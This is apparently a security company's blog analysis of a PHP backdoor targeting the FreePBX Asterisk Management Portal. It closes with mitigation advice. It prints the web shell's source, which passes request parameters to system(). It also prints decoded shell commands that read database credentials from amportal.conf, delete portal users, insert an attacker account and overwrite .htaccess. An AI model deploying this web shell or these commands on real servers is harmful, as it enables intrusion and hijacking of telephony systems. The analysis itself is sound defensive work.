Backdoor Targets FreePBX Asterisk Management Portal 

Backdoor Targets FreePBX Asterisk Management Portal

Written in PHP and JavaScript, FreePBX is a web-based open-source GUI that manages Asterisk, a voice over IP and telephony server. This open-source software allows users to build customer phone systems.

During a recent investigation, I came across a simple piece of malware targeting FreePBX’s Asterisk Management portal which allowed attackers to arbitrarily add and delete users, as well as modify the website’s .htaccess file.

Let’s take a closer look at this backdoor.

PHP script

The following PHP script was found on a compromised WordPress website.

<?php
if ($SERVER["REMOTEADDR"]=="178.162.201.166" && md5($REQUEST['secure'])=="7f02b0ae0869cc5aa38cd7ca6c767c92"){ system($REQUEST['secmd']); }
if(md5($_REQUEST["mgp"])=="4f6e5768b76809bc99bf278494b5f352")
{
echo "login correct
";
echo "";
@system($_REQUEST["c"]);
echo "";

}
system(base64_decode("bXlzcWwg…[TRIMMED]...cqJyk7Ig=="));
system(base64_decode("ZWNobyAnT3JkZX…[TRIMMED]...hY2Nlc3M="));
?>

The malware contains a number of checks to restrict access:

  • It checks the user’s IP to ensure that it matches 178.162.201.166 (which happens to belong to a network for Leaseweb Deutschland GmbH
  • It checks whether the user made a request with a password value that matches the provided md5 hash:
if(md5($_REQUEST["mgp"])==

If these checks pass, the PHP executes an external command passed in the secmd parameter of the request.

From this sample, we can see some base64 encoded strings in the system function. Let’s take a look at what those do.

Commands concealed in base64

Once decoded, the base64 strings reveal the true behavior of the backdoor:

mysql `grep AMPDB /etc/amportal.conf|grep "USER\|PASS\|NAME"| sed 's/AMPDBUSER/a/g'|sed 's/AMPDBPASS/b/g'|sed 's/AMPDBNAME/c/g'|sed 's/a=/-u/g'|sed 's/b=/ -p/g'|sed 's/c=/ /g'|tr -d '\n'` --execute "DELETE from ampusers where username!='admin';INSERT INTO ampusers (username,password_sha1,sections) VALUES ('mgknight','33c7a4df46b1a9f7d4a4636d476849205a04c6b7','*');"

echo 'Order Deny,Allow`deny from all`<Files subdirectory/*>`    deny from all`</Files>`<FilesMatch "\..*$">` Deny from all`</FilesMatch>`<FilesMatch "(^$|index\.php|config\.php|\.(gif|GIF|jpg|jpeg|png|css|js|swf|txt|ico|ttf|svg|eot|woff|wav|mp3|aac|ogg|webm)$|bootstrap\.inc\.php)">` Allow from all`</FilesMatch>`php_value max_input_vars 5000'|tr '`' '\n'>.htaccess

These decoded strings allow the system function to retrieve the amportal database, database user, and password.

The commands use the grep and sed utilities to manipulate the Asterisk amportal.conf configuration file. It then uses the mysql utility to execute an SQL query that deletes users from the database followed by inserting their own malicious user with the name mgknight, giving the attackers access to the Asterisk management portal.

If no instructions are provided, the malware defaults to updating the FreeBPX login credentials and adding rules to the .htaccess file. These directives specify which files should be allowed or denied access based on their names and location in the directory tree, as well as the value of the php_value max_input_vars directives.

Mitigation steps:

Backdoors are often exploited by attackers to gain unauthorized access to websites long after initial infection has occurred. In this case, the attacker’s simple PHP script provided them with all the power needed to arbitrarily add and modify users in the Asterisk Management Portal — as well as modify the site’s .htaccess file.

To mitigate risk, there are a number of steps you can take to protect your website from backdoors:

  1. Keep your software, plugins, themes and extensible components updated. Always patch to the latest version to ensure you’re protecting against known software vulnerabilities.
  2. Use strong and unique passwords for all of your accounts. That includes credentials for sFTP, database, cPanel, and admin users.
  3. Regularly scan your website for malware and backdoors. That means periodically scanning your site at the client and server level to identify any malicious code or website backdoors.
  4. Monitor your website’s logs. Check for unusual or suspicious behavior and consider using a file integrity monitoring system to identify indicators of compromise.
  5. Use a web application firewall (WAF). Firewalls can help prevent brute force, bad bots, and detect potential attacks in your environment.

And if you believe your site has been compromised or backdoored, we can help! Reach out to our support team for assistance – we can help get the malware cleaned up for you.

You May Also Like